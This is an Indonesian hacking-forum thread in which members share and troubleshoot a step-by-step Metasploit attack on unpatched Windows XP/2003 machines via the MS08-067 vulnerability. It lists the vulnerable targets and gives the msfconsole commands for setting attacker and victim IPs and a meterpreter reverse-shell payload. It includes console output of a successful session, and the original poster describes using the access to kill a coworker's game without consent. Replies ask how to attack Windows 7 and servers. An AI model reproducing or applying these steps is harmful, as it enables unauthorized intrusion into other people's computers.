Exploit Windows ga pake Backdoor + ngerjain temen
#21
(02-08-2012, 10:48 AM)kuch1k1 Wrote:
(02-07-2012, 12:04 PM)konspirasi Wrote: samperin, trus bilang mas/mbak itu firewall n antivirusnya bikin exploit saya gagal......wkwkwkwkwk

intinya, itu ms08_067_netapi adalah exploit lama (dari tahunnya aja 2008 a.k.a ms08), coba lihat disini:
https://technet.microsoft.com/en-us/secu...n/ms08-067

disitu tulisannya Published: Thursday, October 23, 2008

jadi sejak tanggal tersebut selama OS Windowsnya diupdate secara berkala maka ga akan mempan lagi di exploitasi dengan cara diatas.

yg bisa:
OS bajakan yg ga bisa update + tanpa antivirus handal

Bener bgt kata om konspirasi
ini emank buat komputer yang pake wedus bajakan aja
yang g bisa update

terus ada cara lain lagi?
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#22
om,kalo hasilnya kayak gini kudu gimana ya?

sf exploit(ms08_067_netapi) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.11
RHOST => 192.168.1.11
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.2:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.1.11
[*] Meterpreter session 2 opened (192.168.1.2:4444 -> 192.168.1.11:1130) at 2012-02-10 16:23:27 +0700

meterpreter > [-] Failed to load extension: undefined method `<=' for nil:NilClass
[-] Failed to load extension: undefined method `<=' for nil:NilClass

#23
(02-10-2012, 05:26 PM)xCode Wrote: om,kalo hasilnya kayak gini kudu gimana ya?

sf exploit(ms08_067_netapi) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.11
RHOST => 192.168.1.11
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.2:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.1.11
[*] Meterpreter session 2 opened (192.168.1.2:4444 -> 192.168.1.11:1130) at 2012-02-10 16:23:27 +0700

meterpreter > [-] Failed to load extension: undefined method `<=' for nil:NilClass
[-] Failed to load extension: undefined method `<=' for nil:NilClass

menurut hdmoore di metasploit, dapat dilihat disini:
http://dev.metasploit.com/redmine/issues/4389

itu karena EOF error yang disebabkan oleh tertutupnya socket tidak dapat diikuti oleh exploit tsb

coba masukkan angka parameter EXITFUNC THREAD di payloadnya, trial n error

#24
hahahahaha, makasih tutorial kk Big Grin
Semua orang adalah guru
Semua tempat adalah sekolah

#25
ka itu kan buat windows xp, kalo buat windows 7 gmana...kan sekarang banyak yg udah pake win 7...??Angel

#26
(03-04-2012, 03:59 PM)DENY Wrote: ka itu kan buat windows xp, kalo buat windows 7 gmana...kan sekarang banyak yg udah pake win 7...??Angel

utk win 7 udah ga vulnerable lagi utk exploit ini (ms08-67) jadi harus pake backdoor, search aja di forum udh ada kok

#27
ane pernah juga coba ni exploit, tp, bukan yg pke meterpreter pke vncinject wktu itu ane, Om , kalo mw exploit ke komp. server bsa gk ?? share ya ommm2 sekaliann, ,
Not Try And Error
But, Try And Learn
Keep Spirit For Learning !

#28
kalo untuk win7 sama ga kaka?
Spoiler! :
<<Back|Track
☆‍‍‍‍☆‍‍‍‍☆‍‍‍‍☆☆


#29
(01-24-2012, 03:29 PM)kuch1k1 Wrote: Permisi
si NEWBIE numpang post Big Grin
maap yah om momod kalo ga bermanfaat, boleh di hapus aja

Ini sebenarnya terinspirasi dari ebooknya milik orang india
kayanya orang disni udah pada tau semua deh
tapi aku share aja siapa tau masih ada yang belom tau
disini aku ganti payloadnya pake meterpreter dan berhasil.
oke langsung aja ke tkp

Victim-nya om
Spoiler! :
Windows 2000 Universal
Windows 2003 SP1 Japanese (NO NX)
Windows 2003 SP2 English (NO NX)
Windows 2003 SP2 English (NX)
Windows 2003 SP2 German (NO NX)
Windows 2003 SP2 German (NX)
Windows XP SP2 Arabic (NX)
Windows XP SP2 Chinese - Traditional / Taiwan (NX)
Windows XP SP2 Chinese - Simplified (NX)
Windows XP SP2 Chinese - Traditional (NX)
Windows XP SP2 Czech (NX)
Windows XP SP0/SP1 Universal
Windows XP SP2 Danish (NX)
Windows XP SP2 German (NX)
Windows XP SP2 Greek (NX)
Windows XP SP2 Spanish (NX)
Windows XP SP2 Finnish (NX)
Windows XP SP2 French (NX)
Windows XP SP2 Hebrew (NX)
Windows XP SP2 Hungarian (NX)
Windows XP SP2 Italian (NX)
Windows XP SP2 Japanese (NX)
Windows XP SP2 English (AlwaysOn NX)
Windows XP SP2 Korean (NX)
Windows XP SP2 Dutch (NX)
Windows XP SP2 Norwegian (NX)
Windows XP SP2 Polish (NX)
Windows XP SP2 Portuguese - Brazilian (NX)
Windows XP SP2 Portuguese (NX)
Windows XP SP2 Russian (NX)
Windows XP SP2 Swedish (NX)
Windows XP SP2 Turkish (NX)
Windows XP SP3 Arabic (NX)
Windows XP SP2 English (NX)
Windows XP SP3 Chinese - Traditional / Taiwan (NX)
Windows XP SP3 Chinese - Simplified (NX)
Windows XP SP3 Chinese - Traditional (NX)
Windows XP SP3 Czech (NX)
Windows XP SP3 Danish (NX)
Windows XP SP3 German (NX)
Windows XP SP3 Greek (NX)
Windows XP SP3 Spanish (NX)
Windows XP SP3 Finnish (NX)
Windows XP SP3 French (NX)
Windows XP SP3 English (AlwaysOn NX)
Windows XP SP3 Hebrew (NX)
Windows XP SP3 Hungarian (NX)
Windows XP SP3 Italian (NX)
Windows XP SP3 Japanese (NX)
Windows XP SP3 Korean (NX)
Windows XP SP3 Dutch (NX)
Windows XP SP3 Norwegian (NX)
Windows XP SP3 Polish (NX)
Windows XP SP3 Portuguese - Brazilian (NX)
Windows XP SP3 Portuguese (NX)
Windows XP SP3 English (NX)
Windows XP SP3 Russian (NX)
Windows XP SP3 Swedish (NX)
Windows XP SP3 Turkish (NX)
Windows 2003 SP2 Japanese (NO NX)
Windows 2003 SP0 Universal
Windows 2003 SP1 English (NO NX)
Windows 2003 SP1 English (NX)

Attacker : Backtrack 5 r1

buka console ketik

Code:
#msfconsole

setelah terbukan metasploit consolenya langsung cari module netapi-nya ketik

Code:
msf >search netapi

setelah ketemu langsung aja ketik seperti berikut ini

Code:
use windows/smb/ms08_067_netapi
>set LHOST 192.168.0.126 <== IP Attacker
>set RHOST 192.168.0.115 <== IP Victim
>set payload windows/meterpreter/reverse_tcp
>exploit

Jika berhasil maka akan seperti berikut
Spoiler! :
[Image: 10n72ma.png]
setelah itu terserah deh om mau apain tuh target
kalo aku isengin temen satu kerjaan yang kerjaannya maen game terus
simpel aja cara buat isenginnya

Code:
meterpreter >ps

maka akan tampil
Spoiler! :
[Image: 2ymakwz.png]
langsung aku kill aja tuh game eco.exe nya dengan perintah

Code:
meterpreter >kill 2920

langsung DC tuh game
hehehhe
maap yah tmn ku abis maen game mulu sih Big Grin

sekian yang bisa aku sampaikan
semoga bisa bermafaat

CMIIW

om.,
ane mau tanya nie.,. Angry Angry
tadinya sie ane bisa N work di korban.,
tapi setelaha ne update kok jadi gni y om??

[Image: 1e2hya.png]

mohon pencerahanya y om
Dari Hati Untuk Raga dan Untuk Kalian

#30
(06-27-2012, 12:05 AM)anon03 Wrote:
(01-24-2012, 03:29 PM)kuch1k1 Wrote: Permisi
si NEWBIE numpang post Big Grin
maap yah om momod kalo ga bermanfaat, boleh di hapus aja

Ini sebenarnya terinspirasi dari ebooknya milik orang india
kayanya orang disni udah pada tau semua deh
tapi aku share aja siapa tau masih ada yang belom tau
disini aku ganti payloadnya pake meterpreter dan berhasil.
oke langsung aja ke tkp

Victim-nya om
Spoiler! :
Windows 2000 Universal
Windows 2003 SP1 Japanese (NO NX)
Windows 2003 SP2 English (NO NX)
Windows 2003 SP2 English (NX)
Windows 2003 SP2 German (NO NX)
Windows 2003 SP2 German (NX)
Windows XP SP2 Arabic (NX)
Windows XP SP2 Chinese - Traditional / Taiwan (NX)
Windows XP SP2 Chinese - Simplified (NX)
Windows XP SP2 Chinese - Traditional (NX)
Windows XP SP2 Czech (NX)
Windows XP SP0/SP1 Universal
Windows XP SP2 Danish (NX)
Windows XP SP2 German (NX)
Windows XP SP2 Greek (NX)
Windows XP SP2 Spanish (NX)
Windows XP SP2 Finnish (NX)
Windows XP SP2 French (NX)
Windows XP SP2 Hebrew (NX)
Windows XP SP2 Hungarian (NX)
Windows XP SP2 Italian (NX)
Windows XP SP2 Japanese (NX)
Windows XP SP2 English (AlwaysOn NX)
Windows XP SP2 Korean (NX)
Windows XP SP2 Dutch (NX)
Windows XP SP2 Norwegian (NX)
Windows XP SP2 Polish (NX)
Windows XP SP2 Portuguese - Brazilian (NX)
Windows XP SP2 Portuguese (NX)
Windows XP SP2 Russian (NX)
Windows XP SP2 Swedish (NX)
Windows XP SP2 Turkish (NX)
Windows XP SP3 Arabic (NX)
Windows XP SP2 English (NX)
Windows XP SP3 Chinese - Traditional / Taiwan (NX)
Windows XP SP3 Chinese - Simplified (NX)
Windows XP SP3 Chinese - Traditional (NX)
Windows XP SP3 Czech (NX)
Windows XP SP3 Danish (NX)
Windows XP SP3 German (NX)
Windows XP SP3 Greek (NX)
Windows XP SP3 Spanish (NX)
Windows XP SP3 Finnish (NX)
Windows XP SP3 French (NX)
Windows XP SP3 English (AlwaysOn NX)
Windows XP SP3 Hebrew (NX)
Windows XP SP3 Hungarian (NX)
Windows XP SP3 Italian (NX)
Windows XP SP3 Japanese (NX)
Windows XP SP3 Korean (NX)
Windows XP SP3 Dutch (NX)
Windows XP SP3 Norwegian (NX)
Windows XP SP3 Polish (NX)
Windows XP SP3 Portuguese - Brazilian (NX)
Windows XP SP3 Portuguese (NX)
Windows XP SP3 English (NX)
Windows XP SP3 Russian (NX)
Windows XP SP3 Swedish (NX)
Windows XP SP3 Turkish (NX)
Windows 2003 SP2 Japanese (NO NX)
Windows 2003 SP0 Universal
Windows 2003 SP1 English (NO NX)
Windows 2003 SP1 English (NX)

Attacker : Backtrack 5 r1

buka console ketik

Code:
#msfconsole

setelah terbukan metasploit consolenya langsung cari module netapi-nya ketik

Code:
msf >search netapi

setelah ketemu langsung aja ketik seperti berikut ini

Code:
use windows/smb/ms08_067_netapi
>set LHOST 192.168.0.126 <== IP Attacker
>set RHOST 192.168.0.115 <== IP Victim
>set payload windows/meterpreter/reverse_tcp
>exploit

Jika berhasil maka akan seperti berikut
Spoiler! :
[Image: 10n72ma.png]
setelah itu terserah deh om mau apain tuh target
kalo aku isengin temen satu kerjaan yang kerjaannya maen game terus
simpel aja cara buat isenginnya

Code:
meterpreter >ps

maka akan tampil
Spoiler! :
[Image: 2ymakwz.png]
langsung aku kill aja tuh game eco.exe nya dengan perintah

Code:
meterpreter >kill 2920

langsung DC tuh game
hehehhe
maap yah tmn ku abis maen game mulu sih Big Grin

sekian yang bisa aku sampaikan
semoga bisa bermafaat

CMIIW

om.,
ane mau tanya nie.,. Angry Angry
tadinya sie ane bisa N work di korban.,
tapi setelaha ne update kok jadi gni y om??

[Image: 1e2hya.png]

mohon pencerahanya y om

udah ga ada di helpnya Tongue
selalu perhatikan changelog ketika akan melakukan update program :tkp:






Users browsing this thread: 4 Guest(s)